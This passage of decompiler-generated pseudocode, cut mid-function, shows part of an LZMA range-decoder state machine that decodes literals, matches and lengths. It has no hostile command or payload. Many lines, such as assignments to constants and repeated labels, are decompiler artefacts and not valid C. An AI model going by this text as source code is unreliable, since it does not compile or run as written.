                                                                                                                        													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                        													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                        													 *(_t613 - 0x40) = 1;
                                                                                                                        													_t532 = _t531 - (_t531 >> 5);
                                                                                                                        													 *_t606 = _t532;
                                                                                                                        												} else {
                                                                                                                        													 *(_t613 - 0x10) = _t565;
                                                                                                                        													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                        													 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                                                                        												}
                                                                                                                        												if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                        													goto L139;
                                                                                                                        												}
                                                                                                                        											case 5:
                                                                                                                        												goto L137;
                                                                                                                        											case 6:
                                                                                                                        												__edx = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                                                        													 *(__ebp - 0x34) = 1;
                                                                                                                        													 *(__ebp - 0x84) = 7;
                                                                                                                        													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                                                        													while(1) {
                                                                                                                        														L132:
                                                                                                                        														 *(_t613 - 0x54) = _t606;
                                                                                                                        														goto L133;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                                                        												__esi =  *(__ebp - 0x60);
                                                                                                                        												__cl = 8;
                                                                                                                        												__cl = 8 -  *(__ebp - 0x3c);
                                                                                                                        												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                                                        												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                                                        												__ecx =  *(__ebp - 0x3c);
                                                                                                                        												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                        												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                                                        												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 4;
                                                                                                                        												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                                                        												if( *(__ebp - 0x38) >= 4) {
                                                                                                                        													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                                                        													if( *(__ebp - 0x38) >= 0xa) {
                                                                                                                        														_t98 = __ebp - 0x38;
                                                                                                                        														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                                                        														__eflags =  *_t98;
                                                                                                                        													} else {
                                                                                                                        														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                                                        													}
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x38) = 0;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                                                        												if( *(__ebp - 0x34) == __edx) {
                                                                                                                        													__ebx = 0;
                                                                                                                        													__ebx = 1;
                                                                                                                        													goto L61;
                                                                                                                        												} else {
                                                                                                                        													__eax =  *(__ebp - 0x14);
                                                                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        														__eflags = __eax;
                                                                                                                        													}
                                                                                                                        													__ecx =  *(__ebp - 8);
                                                                                                                        													__ebx = 0;
                                                                                                                        													__ebx = 1;
                                                                                                                        													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                        													goto L41;
                                                                                                                        												}
                                                                                                                        											case 7:
                                                                                                                        												__eflags =  *(__ebp - 0x40) - 1;
                                                                                                                        												if( *(__ebp - 0x40) != 1) {
                                                                                                                        													__eax =  *(__ebp - 0x24);
                                                                                                                        													 *(__ebp - 0x80) = 0x16;
                                                                                                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        													__eax =  *(__ebp - 0x28);
                                                                                                                        													 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        													__eax =  *(__ebp - 0x2c);
                                                                                                                        													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                        													__eax = 0;
                                                                                                                        													__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        													__al = __al & 0x000000fd;
                                                                                                                        													__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__eax =  *(__ebp - 4) + 0x664;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													 *(__ebp - 0x58) = __eax;
                                                                                                                        													goto L69;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 4);
                                                                                                                        												__ecx =  *(__ebp - 0x38);
                                                                                                                        												 *(__ebp - 0x84) = 8;
                                                                                                                        												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                                                                        												while(1) {
                                                                                                                        													L132:
                                                                                                                        													 *(_t613 - 0x54) = _t606;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        											case 8:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__eax =  *(__ebp - 4);
                                                                                                                        													__ecx =  *(__ebp - 0x38);
                                                                                                                        													 *(__ebp - 0x84) = 0xa;
                                                                                                                        													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                                                        												} else {
                                                                                                                        													__eax =  *(__ebp - 0x38);
                                                                                                                        													__ecx =  *(__ebp - 4);
                                                                                                                        													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                                                        													 *(__ebp - 0x84) = 9;
                                                                                                                        													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                                                        													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                                                        												}
                                                                                                                        												while(1) {
                                                                                                                        													L132:
                                                                                                                        													 *(_t613 - 0x54) = _t606;
                                                                                                                        													goto L133;
                                                                                                                        												}
                                                                                                                        											case 9:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													goto L89;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x60);
                                                                                                                        												if( *(__ebp - 0x60) == 0) {
                                                                                                                        													goto L171;
                                                                                                                        												}
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        												_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                        												__eflags = _t259;
                                                                                                                        												0 | _t259 = _t259 + _t259 + 9;
                                                                                                                        												 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                                                                                        												goto L76;
                                                                                                                        											case 0xa:
                                                                                                                        												goto L0;
                                                                                                                        											case 0xb:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__ecx =  *(__ebp - 0x24);
                                                                                                                        													__eax =  *(__ebp - 0x20);
                                                                                                                        													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                        												} else {
                                                                                                                        													__eax =  *(__ebp - 0x24);
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x28);
                                                                                                                        												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                        												goto L88;
                                                                                                                        											case 0xc:
                                                                                                                        												L99:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xc;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t334 = __ebp - 0x70;
                                                                                                                        												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t334;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												__eax =  *(__ebp - 0x2c);
                                                                                                                        												goto L101;
                                                                                                                        											case 0xd:
                                                                                                                        												L37:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xd;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t122 = __ebp - 0x70;
                                                                                                                        												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t122;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												L39:
                                                                                                                        												__eax =  *(__ebp - 0x40);
                                                                                                                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                                                        													goto L48;
                                                                                                                        												}
                                                                                                                        												__eflags = __ebx - 0x100;
                                                                                                                        												if(__ebx >= 0x100) {
                                                                                                                        													goto L54;
                                                                                                                        												}
                                                                                                                        												L41:
                                                                                                                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                                                        												__ecx =  *(__ebp - 0x58);
                                                                                                                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                                                        												 *(__ebp - 0x48) = __eax;
                                                                                                                        												__eax = __eax + 1;
                                                                                                                        												__eax = __eax << 8;
                                                                                                                        												__eax = __eax + __ebx;
                                                                                                                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__edx = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													 *(__ebp - 0x40) = 1;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													__ebx = __ebx + __ebx + 1;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edx;
                                                                                                                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													goto L39;
                                                                                                                        												} else {
                                                                                                                        													goto L37;
                                                                                                                        												}
                                                                                                                        											case 0xe:
                                                                                                                        												L46:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xe;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t156 = __ebp - 0x70;
                                                                                                                        												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t156;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												while(1) {
                                                                                                                        													L48:
                                                                                                                        													__eflags = __ebx - 0x100;
                                                                                                                        													if(__ebx >= 0x100) {
                                                                                                                        														break;
                                                                                                                        													}
                                                                                                                        													__eax =  *(__ebp - 0x58);
                                                                                                                        													__edx = __ebx + __ebx;
                                                                                                                        													__ecx =  *(__ebp - 0x10);
                                                                                                                        													__esi = __edx + __eax;
                                                                                                                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        													__ax =  *__esi;
                                                                                                                        													 *(__ebp - 0x54) = __esi;
                                                                                                                        													__edi = __ax & 0x0000ffff;
                                                                                                                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        														__cx = __ax;
                                                                                                                        														_t170 = __edx + 1; // 0x1
                                                                                                                        														__ebx = _t170;
                                                                                                                        														__cx = __ax >> 5;
                                                                                                                        														__eflags = __eax;
                                                                                                                        														 *__esi = __ax;
                                                                                                                        													} else {
                                                                                                                        														 *(__ebp - 0x10) = __ecx;
                                                                                                                        														0x800 = 0x800 - __edi;
                                                                                                                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        														__ebx = __ebx + __ebx;
                                                                                                                        														 *__esi = __cx;
                                                                                                                        													}
                                                                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        														continue;
                                                                                                                        													} else {
                                                                                                                        														goto L46;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												L54:
                                                                                                                        												_t173 = __ebp - 0x34;
                                                                                                                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                        												__eflags =  *_t173;
                                                                                                                        												goto L55;
                                                                                                                        											case 0xf:
                                                                                                                        												L58:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0xf;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t203 = __ebp - 0x70;
                                                                                                                        												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t203;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												L60:
                                                                                                                        												__eflags = __ebx - 0x100;
                                                                                                                        												if(__ebx >= 0x100) {
                                                                                                                        													L55:
                                                                                                                        													__al =  *(__ebp - 0x44);
                                                                                                                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                                                                        													goto L56;
                                                                                                                        												}
                                                                                                                        												L61:
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												__edx = __ebx + __ebx;
                                                                                                                        												__ecx =  *(__ebp - 0x10);
                                                                                                                        												__esi = __edx + __eax;
                                                                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__edi = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													_t217 = __edx + 1; // 0x1
                                                                                                                        													__ebx = _t217;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eflags = __eax;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edi;
                                                                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        													__ebx = __ebx + __ebx;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													goto L60;
                                                                                                                        												} else {
                                                                                                                        													goto L58;
                                                                                                                        												}
                                                                                                                        											case 0x10:
                                                                                                                        												L109:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x10;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t365 = __ebp - 0x70;
                                                                                                                        												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t365;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												goto L111;
                                                                                                                        											case 0x11:
                                                                                                                        												goto L69;
                                                                                                                        											case 0x12:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													__eax =  *(__ebp - 0x58);
                                                                                                                        													 *(__ebp - 0x84) = 0x13;
                                                                                                                        													__esi =  *(__ebp - 0x58) + 2;
                                                                                                                        													while(1) {
                                                                                                                        														L132:
                                                                                                                        														 *(_t613 - 0x54) = _t606;
                                                                                                                        														goto L133;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x4c);
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                        												__ecx =  *(__ebp - 0x58);
                                                                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        												__eflags = __eax;
                                                                                                                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                        												goto L130;
                                                                                                                        											case 0x13:
                                                                                                                        												__eflags =  *(__ebp - 0x40);
                                                                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                                                                        													_t469 = __ebp - 0x58;
                                                                                                                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                        													__eflags =  *_t469;
                                                                                                                        													 *(__ebp - 0x30) = 0x10;
                                                                                                                        													 *(__ebp - 0x40) = 8;
                                                                                                                        													L144:
                                                                                                                        													 *(__ebp - 0x7c) = 0x14;
                                                                                                                        													goto L145;
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x4c);
                                                                                                                        												__ecx =  *(__ebp - 0x58);
                                                                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                        												 *(__ebp - 0x30) = 8;
                                                                                                                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                        												L130:
                                                                                                                        												 *(__ebp - 0x58) = __eax;
                                                                                                                        												 *(__ebp - 0x40) = 3;
                                                                                                                        												goto L144;
                                                                                                                        											case 0x14:
                                                                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                        												__eax =  *(__ebp - 0x80);
                                                                                                                        												 *(_t613 - 0x88) = _t533;
                                                                                                                        												goto L1;
                                                                                                                        											case 0x15:
                                                                                                                        												__eax = 0;
                                                                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                        												__al = __al & 0x000000fd;
                                                                                                                        												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                        												goto L120;
                                                                                                                        											case 0x16:
                                                                                                                        												__eax =  *(__ebp - 0x30);
                                                                                                                        												__eflags = __eax - 4;
                                                                                                                        												if(__eax >= 4) {
                                                                                                                        													_push(3);
                                                                                                                        													_pop(__eax);
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 4);
                                                                                                                        												 *(__ebp - 0x40) = 6;
                                                                                                                        												__eax = __eax << 7;
                                                                                                                        												 *(__ebp - 0x7c) = 0x19;
                                                                                                                        												 *(__ebp - 0x58) = __eax;
                                                                                                                        												goto L145;
                                                                                                                        											case 0x17:
                                                                                                                        												L145:
                                                                                                                        												__eax =  *(__ebp - 0x40);
                                                                                                                        												 *(__ebp - 0x50) = 1;
                                                                                                                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                        												goto L149;
                                                                                                                        											case 0x18:
                                                                                                                        												L146:
                                                                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                                                                        													 *(__ebp - 0x88) = 0x18;
                                                                                                                        													goto L170;
                                                                                                                        												}
                                                                                                                        												__ecx =  *(__ebp - 0x70);
                                                                                                                        												__eax =  *(__ebp - 0xc);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												_t484 = __ebp - 0x70;
                                                                                                                        												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                        												__eflags =  *_t484;
                                                                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                        												L148:
                                                                                                                        												_t487 = __ebp - 0x48;
                                                                                                                        												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                        												__eflags =  *_t487;
                                                                                                                        												L149:
                                                                                                                        												__eflags =  *(__ebp - 0x48);
                                                                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                                                                        													__ecx =  *(__ebp - 0x40);
                                                                                                                        													__ebx =  *(__ebp - 0x50);
                                                                                                                        													0 = 1;
                                                                                                                        													__eax = 1 << __cl;
                                                                                                                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                        													__eax =  *(__ebp - 0x7c);
                                                                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                                                                        													while(1) {
                                                                                                                        														 *(_t613 - 0x88) = _t533;
                                                                                                                        														goto L1;
                                                                                                                        													}
                                                                                                                        												}
                                                                                                                        												__eax =  *(__ebp - 0x50);
                                                                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        												__eax =  *(__ebp - 0x58);
                                                                                                                        												__esi = __edx + __eax;
                                                                                                                        												 *(__ebp - 0x54) = __esi;
                                                                                                                        												__ax =  *__esi;
                                                                                                                        												__edi = __ax & 0x0000ffff;
                                                                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                        													__cx = __ax;
                                                                                                                        													__cx = __ax >> 5;
                                                                                                                        													__eax = __eax - __ecx;
                                                                                                                        													__edx = __edx + 1;
                                                                                                                        													__eflags = __edx;
                                                                                                                        													 *__esi = __ax;
                                                                                                                        													 *(__ebp - 0x50) = __edx;
                                                                                                                        												} else {
                                                                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                                                                        													0x800 = 0x800 - __edi;
                                                                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        													 *__esi = __cx;
                                                                                                                        												}
                                                                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        													goto L148;
                                                                                                                        												} else {
                                                                                                                        													goto L146;
                                                                                                                        												}
                                                                                                                        											case 0x19:
                                                                                                                        												__eflags = __ebx - 4;
                                                                                                                        												if(__ebx < 4) {
                                                                                                                        													 *(__ebp - 0x2c) = __ebx;
                                                                                                                        													L119:
                                                                                                                        													_t393 = __ebp - 0x2c;
                                                                                                                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                        													__eflags =  *_t393;
                                                                                                                        													L120:
                                                                                                                        													__eax =  *(__ebp - 0x2c);
                                                                                                                        													__eflags = __eax;
                                                                                                                        													if(__eax == 0) {
                                                                                                                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                        														goto L170;
                                                                                                                        													}
                                                                                                                        													__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                        													if(__eax >  *(__ebp - 0x60)) {
                                                                                                                        														goto L171;
                                                                                                                        													}
                                                                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                        													__eax =  *(__ebp - 0x30);
